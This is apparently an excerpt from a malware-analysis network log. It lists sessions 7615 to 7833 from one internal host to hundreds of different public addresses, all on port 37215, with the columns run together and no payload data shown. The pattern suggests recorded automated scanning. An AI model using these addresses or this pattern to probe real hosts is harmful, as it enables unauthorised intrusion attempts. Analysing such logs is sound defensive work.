                                          7615192.168.2.2343574157.20.217.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7616192.168.2.2342318123.115.53.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7617192.168.2.234460039.174.37.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7618192.168.2.2336302206.205.129.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7619192.168.2.235852241.46.129.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7620192.168.2.233837641.93.116.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7621192.168.2.2350398157.66.150.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7622192.168.2.235452641.148.245.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7623192.168.2.235632041.125.184.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7624192.168.2.2348006197.123.81.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7625192.168.2.2337270157.51.47.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7626192.168.2.2347884157.196.13.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7627192.168.2.233771259.22.83.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7628192.168.2.233641641.193.121.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7629192.168.2.2358304155.215.155.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7630192.168.2.235129841.26.113.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7631192.168.2.2339042197.177.63.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7632192.168.2.2353388197.109.207.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7633192.168.2.2340650197.34.19.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7634192.168.2.234153293.56.135.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7635192.168.2.2360982157.108.184.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7636192.168.2.2342144157.178.156.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7637192.168.2.234149841.50.103.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7638192.168.2.2344626157.112.165.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7639192.168.2.2352436157.222.56.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7640192.168.2.235000641.90.23.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7641192.168.2.2351340197.171.14.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7642192.168.2.2335552197.6.135.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7643192.168.2.2356804132.23.102.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7644192.168.2.233929641.47.198.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7645192.168.2.235838639.139.90.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7646192.168.2.2351536197.169.248.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7647192.168.2.2339284175.20.158.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7648192.168.2.235471241.87.170.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7649192.168.2.2339108197.29.5.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7650192.168.2.233633688.95.205.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7651192.168.2.2359798197.125.43.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7652192.168.2.233941641.63.171.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7653192.168.2.234208265.23.23.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7654192.168.2.2354542197.196.111.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7655192.168.2.234001041.64.78.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7656192.168.2.2334128157.201.197.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7657192.168.2.234849441.14.88.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7658192.168.2.233283041.39.0.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7659192.168.2.2351052157.144.184.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7660192.168.2.2356638181.47.189.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7661192.168.2.2352642157.168.224.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7662192.168.2.2350588157.246.227.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7663192.168.2.2349022197.5.131.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7664192.168.2.2360968157.121.63.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7665192.168.2.233288041.223.112.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7666192.168.2.2356070143.127.180.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7667192.168.2.2339188157.83.136.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7668192.168.2.2360566197.154.169.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7669192.168.2.234613041.176.185.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7670192.168.2.2334314123.172.63.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7671192.168.2.234344462.46.65.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7672192.168.2.234201041.232.132.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7673192.168.2.2349560129.117.170.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7674192.168.2.2342214157.24.100.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7675192.168.2.2333606157.46.98.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7676192.168.2.2357910157.149.198.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7677192.168.2.233386441.40.181.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7678192.168.2.233672063.84.186.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7679192.168.2.234852641.167.73.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7680192.168.2.2360438157.70.250.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7681192.168.2.2335674157.217.38.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7682192.168.2.234820241.213.186.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7683192.168.2.2336246197.229.184.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7684192.168.2.235575859.238.101.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7685192.168.2.2348394197.204.28.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7686192.168.2.234785832.142.46.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7687192.168.2.235453241.73.121.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7688192.168.2.234481041.7.14.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7689192.168.2.2358978184.82.72.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7690192.168.2.2344432157.1.230.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7691192.168.2.2355248143.185.111.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7692192.168.2.2360442197.217.202.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7693192.168.2.2335598157.25.61.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7694192.168.2.2359556157.176.5.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7695192.168.2.2354318197.9.118.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7696192.168.2.2336058197.172.244.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7697192.168.2.2340764174.54.136.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7698192.168.2.2359618157.98.56.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7699192.168.2.2353834157.184.182.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7700192.168.2.2360884221.234.176.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7701192.168.2.2346244135.180.71.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7702192.168.2.235168441.33.55.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7703192.168.2.2352102103.92.117.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7704192.168.2.2342604220.158.148.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7705192.168.2.2339722157.42.236.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7706192.168.2.2344658206.149.238.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7707192.168.2.234701241.30.255.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7708192.168.2.2334102157.118.124.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7709192.168.2.2338332147.132.38.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7710192.168.2.235035838.7.59.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7711192.168.2.2339802157.128.243.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7712192.168.2.2352352197.118.50.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7713192.168.2.2333828197.23.78.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7714192.168.2.235012841.246.187.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7715192.168.2.234926641.111.98.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7716192.168.2.2335080157.97.234.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7717192.168.2.2341286118.238.20.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7718192.168.2.236027841.78.97.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7719192.168.2.2346118204.60.134.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7720192.168.2.235487041.144.34.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7721192.168.2.2357100157.160.189.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7722192.168.2.235953641.69.28.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7723192.168.2.235546241.67.226.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7724192.168.2.2333762197.163.35.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7725192.168.2.2350126157.141.210.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7726192.168.2.234273479.15.91.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7727192.168.2.235356241.234.206.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7728192.168.2.2350246157.153.125.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7729192.168.2.2337498197.199.85.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7730192.168.2.2348288157.32.189.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7731192.168.2.233548046.87.247.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7732192.168.2.234922641.90.199.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7733192.168.2.2353746197.110.157.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7734192.168.2.2339234157.229.75.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7735192.168.2.2337920157.50.54.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7736192.168.2.233898641.136.19.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7737192.168.2.233741641.230.200.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7738192.168.2.2343188157.134.1.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7739192.168.2.235179441.96.11.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7740192.168.2.234324041.134.237.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7741192.168.2.235275641.61.81.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7742192.168.2.234111241.146.227.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7743192.168.2.235724041.73.57.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7744192.168.2.2347912157.245.196.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7745192.168.2.2346710106.205.178.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7746192.168.2.235644641.94.111.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7747192.168.2.2341432197.188.52.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7748192.168.2.2358952217.39.127.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7749192.168.2.2340184157.23.124.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7750192.168.2.2357134157.242.142.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7751192.168.2.2346986157.0.245.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7752192.168.2.2339122197.234.158.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7753192.168.2.2355382204.204.156.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7754192.168.2.2333898197.149.83.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7755192.168.2.2338526157.94.71.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7756192.168.2.2358378157.69.62.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7757192.168.2.2359412197.66.81.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7758192.168.2.235676641.101.110.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7759192.168.2.235592642.20.47.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7760192.168.2.234535041.147.48.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7761192.168.2.2333914195.187.193.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7762192.168.2.2347048157.221.107.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7763192.168.2.2353684157.28.92.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7764192.168.2.2345106197.7.206.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7765192.168.2.2351768197.211.251.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7766192.168.2.2336088190.196.132.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7767192.168.2.235692241.13.134.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7768192.168.2.234359823.207.194.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7769192.168.2.2340472157.12.57.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7770192.168.2.233411641.252.142.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7771192.168.2.233908841.82.8.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7772192.168.2.233377841.130.213.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7773192.168.2.235951641.91.169.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7774192.168.2.2360436157.121.164.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7775192.168.2.2338724197.46.50.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7776192.168.2.2347960197.192.231.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7777192.168.2.2348590117.185.135.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7778192.168.2.2357854157.38.60.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7779192.168.2.233938641.93.147.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7780192.168.2.234018241.75.179.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7781192.168.2.236082441.159.234.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7782192.168.2.2341178157.2.64.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7783192.168.2.235993641.199.105.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7784192.168.2.2347794157.160.165.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7785192.168.2.2332964144.104.78.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7786192.168.2.2336398136.222.221.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7787192.168.2.235062641.188.124.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7788192.168.2.2339030197.129.254.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7789192.168.2.2343196157.95.142.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7790192.168.2.2340934157.47.51.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7791192.168.2.2346256157.150.38.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7792192.168.2.236012086.192.8.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7793192.168.2.2334008197.12.226.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7794192.168.2.235925441.33.101.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7795192.168.2.2354178104.110.183.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7796192.168.2.2347882157.136.242.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7797192.168.2.2344404197.131.33.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7798192.168.2.2349200121.81.216.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7799192.168.2.2354924197.177.31.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7800192.168.2.2333868197.88.72.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7801192.168.2.2340756197.248.118.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7802192.168.2.2341252197.177.181.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7803192.168.2.2357116157.239.251.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7804192.168.2.2358244197.149.52.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7805192.168.2.2355358157.72.159.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7806192.168.2.233830441.250.115.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7807192.168.2.2333534136.110.141.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7808192.168.2.2347166157.107.103.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7809192.168.2.2360208157.235.236.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7810192.168.2.233321841.47.172.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7811192.168.2.2354684157.181.18.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7812192.168.2.235368677.74.241.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7813192.168.2.234552465.33.84.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7814192.168.2.2338022135.48.10.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7815192.168.2.2339456205.224.111.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7816192.168.2.233382441.247.196.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7817192.168.2.233430088.214.7.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7818192.168.2.2351092197.61.199.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7819192.168.2.2356884197.74.35.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7820192.168.2.235293872.93.102.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7821192.168.2.2340288197.228.56.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7822192.168.2.233618641.66.233.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7823192.168.2.2345162157.206.247.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7824192.168.2.2358574197.33.17.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7825192.168.2.2354476157.198.5.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7826192.168.2.2355306157.55.215.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7827192.168.2.233527841.148.45.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7828192.168.2.2358018197.138.38.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7829192.168.2.2358684112.113.40.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7830192.168.2.2350790201.247.129.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7831192.168.2.235679241.1.251.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7832192.168.2.235678241.82.190.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7833192.168.2.2355454157.77.138.19437215
                                          TimestampBytes transferredDirectionData


